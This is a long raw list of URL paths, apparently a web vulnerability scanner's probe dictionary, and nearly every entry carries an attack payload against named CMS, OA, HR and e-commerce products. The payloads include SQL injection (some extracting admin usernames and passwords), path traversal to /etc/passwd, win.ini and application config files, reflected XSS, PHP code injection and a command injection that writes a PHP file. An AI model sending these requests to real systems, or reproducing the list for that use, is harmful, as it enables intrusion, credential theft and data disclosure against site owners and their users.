/piw/Job/positionDetail.jsp?ID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7c,IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20),0x7c),NULL,NULL,NULL,NULL,NULL /piw/Member/UploadMemberAttach.jsp /piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23 /piw/MessageBoard/message.jsp?DataId=1&Code=1%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,md5(0x234445),0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23 /piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1 /piw/Question/module/code.jsp?value=1'%20AND%20(SELECT%202554%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'HgST'='HgST /piw/Question/module/codebranchs.jsp?value=1'%20AND%20(SELECT%202554%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'HgST'='HgST /piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) /piw/Site/BadWordsExport.jsp?ids=888%20AND%20(SELECT%202798%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) /piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23 /plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292 /plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97)) /plugin.php?id=Network114:Network114&ljtype=1%bf%27 /plugins/?q=area&area_id=-1%20union%20select%201,md5(0x7765627363616e),3,4,5,6%23 /plugins/annotate/pages/get.php?ref=1%27%20AND%20(SELECT%206564%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,(MID((IFNULL(CAST(md5(0xe414)%20AS%20CHAR),0x20)),1,50)),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27a%27=%27a /plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj /plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271 /plugins/weathermap/weathermap-cacti-plugin.php /plus/ /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500 /plus/Promotion.asp /plus/ad_js.php?aid=1&nocache=1 /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23 /plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23 /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23 /plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29// /plus/carbuyaction.php?dopost=return&code=../../index /plus/carbuyaction.php?dopost=return&code=../../tags /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35 /plus/outside.php?id=../template/default/style/yun_index.css%00 /plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 /plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=http://xxooxxoo.js%3E /plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title /por/login_psw.csp /portal/WEB-INF/web.xml /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd /portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo /portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1 /portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 /portal/por_modules_add.jsp?ModuleID=1'%20UNION%20all%20SELECT%20NULL,0x3E5F6F686568655F3C%23 /portal/query_user_password_qustion.aspx?user_name=%20just_test'%20and%201=char(106)%20-- /post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=,prompt(42873) /post.php?part=input&catid=8%DF%27%20OR%201%20GROUP%20BY%20CONCAT%280x7e21%2Cmd5%280x451545%29%2C0x217e%2CFLOOR%28RAND%280%29%2a2%29%29%20HAVING%20MIN%280%29%20--%20vDZN /posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj /poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20 /price.asp?kind=1%27%20UNION%20ALL%20SELECT%20NULL%2CCHR%28106%29%26CHR%2858%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16 /print/search_print_proof.jsp?proof_no=just_sql_test' /private/ /product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html /product_view.asp /productpic.aspx?id=100611)%20and%201=char(106)%20-- /products.asp /prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20 /projects /protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin /prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at /prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini /pub/help.php?key=YToxOntpOjA7czozMDoiLy4uLy4uLy4uLy4uL3RzdnIvdHVyYm9jcm0uaW5pIjt9 /pub/help2.php?key=/../../tsvr/turbocrm.ini /pub/search/default.asp?id=-1/**/and/**/1=char(106)-- /pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51 /pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1 /pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1 /public/ /public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd /public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini /public/minify.php?f=../ooxxooxxo/hehe.js /queryserverinfo.php?puchanid=%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28concat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 /queryserverinfo.php?type=4&=3&puchanid=-1+or+1=1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) /radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0 /redmine/ /report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E /reports/CreateReportTable.jsp?site=0 /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd /resin-doc/viewfile/?file=index.jsp /resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 /respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20( /resume/?key=xxxx%bf%22;alert(360);// /robots.txt /robots.txt/360.php /rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a /s/click.php?bGlua19pZD0nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLHZlcnNpb24oKSwweDdlKSwwKSM= /s/go.php?bGlua19pZD0nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLHVzZXIoKSwweDdlKSwwKSM= /samples/ /schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20-- /script /scripts/ /scripts/uistrings.cgi /scrp/feedbackdetail.cfm?iSno=-4321%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20 /scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL) /seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23 /search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23 /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 /search.php?mod=information&ids=1-webscan&catid=1 /search.php?part=course&keywords=%27/**/AND/**/(SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(version(),(0x7C),md5(1122),(0x7C),FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.CHARACTER_SETS/**/GROUP/**/BY/**/x)a)/**/and/**/%27a%27=%27a /search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2 /search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C' /search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=-1%27+and+1=2+union+select+NULL,char(106)%2bchar(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- /searchLines.aspx?LName=h%25'; /searchLines.aspx?LName=h&t=webscan()' /secure/Signup!default.jspa /seeyon/main.do?method=certDown&realPath=../../base/conf/datasource.properties%00a /seeyon/management/status.jsp /selfservice/downfile/down?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /selfservice/infomanager/board/downboardview?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /selfservice/welcome/downboard?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /selfservice/welcome/downboardview?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /server-info /server-status /servermanage.php?NodeID=-1&SelType=-1%29%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23 /servermanage.php?SelType=-1)%20AND%20(SELECT%20360%20FROM(SELECT%20COUNT(*),CONCAT(0x3A703A,(MID((IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20)),1,50)),0x3A713A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(1=1 /service/local/outreach/welcome/nexusSpaces.css /service/showdevice.php?iDeviceId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23 /servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt /servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt /servlet/FileUploadServlet?fileName=../WEB-INF/proxool.xml /servlet/HistoryDownLoad?id=-1%20union%20all%20select%201,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /servlet/OutputCode?path=c:/windows/win.ini /servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd /servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf /servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf /servlet/hirelogin/BrowseFileServlet?dbName=Usr&a0100=-1'%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /servlet/hirelogin/BrowseFileServlet?dbName=Usr&i9999=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /servlet/hirelogin/BrowseFileServlet?dbName=k00%20where%201=2%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /servlet/performance/fileDownLoad?article_id=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /servlet/performance/fileDownLoad?opt=hire&e01a1=-1'%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /servlet/performance/fileDownLoad?opt=workView&file_id=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /servlet/performance/fileDownLoad?opt=workView&file_id=-1&p0100=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /setup/setup1.jsp /sgin/filemanage/default.asp?action=viewfolder&path= /share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test /shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86 /shop.php?ac=view&shopid=1-cfreer /shop.php?ctl=index&act=ajax_purpose_store&purpose_id=1%20and%20(select/**/%201%20from/**/%20(select/**/%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from/**/%20information_schema.tables%20group%20by%20x)a)%23 /show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN /show.aspx?type=1&action=GetImg&pids=(select%20char(58)) /show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT /showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all /shownews.aspx?newsno=-1'%20AND%201=CHAR(106)%20-- /shownews.aspx?newsno=-1'%20and%201=char(106)%20-- /showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106) /showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20-- /showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type= /showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type= /siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx /siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);-- /siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B-- /siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20-- /siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20-- /siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20-- /sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1 /solr/dev/admin/ /specialty.asp?Tbynf=1%20and%201%3Echar(106)%20-- /sql.inc /sqoa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt /sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20-- /stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20-- /statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23 /statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1 /store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid= /subareamanage.php?NodeID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23 /subareamanage.php?Page=1&&DelNode=1&NodeType=-1%20or%201=1%20and%20(SELECT%201%20and%20ROW(1,1)%3E(SELECT%20COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a) /suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b) /superadmin/ /swfupload/upload_files.php?uid=1%7Cecho+cedar+%3E%3Eohehe.php /sys/user/addfunction.jsp?RoleID=1')%20UNION%20all%20SELECT%200x3E5F6F686568655F3C,NULL,NULL,NULL,NULL,NULL,NULL%23 /sys/user/agenttree_xml.jsp?_conf_type=user&_parent_id=1'%20UNION%20all%20SELECT%20NULL,NULL,0x3E5F6F686568655F3C,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 /sys/user/changedept.jsp?DeptID=1'%20UNION%20ALL%20SELECT%200x3E5F6F686568655F3C,NULL%23&AgentID=1 /sys/user/p_dept_group_seldept.jsp?GroupID=1')%20UNION%20all%20SELECT%200x3E5F6F686568655F3C,NULL,NULL,NULL%23 /sys/user/portal_module_permission_parts_xml.jsp?_conf_type=user&_parent_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 /sys/user/webagentlist.jsp?DeptID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 /sys/user/webagenttree_xml.jsp?_parent_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 /sysinfo.jsp /system/ 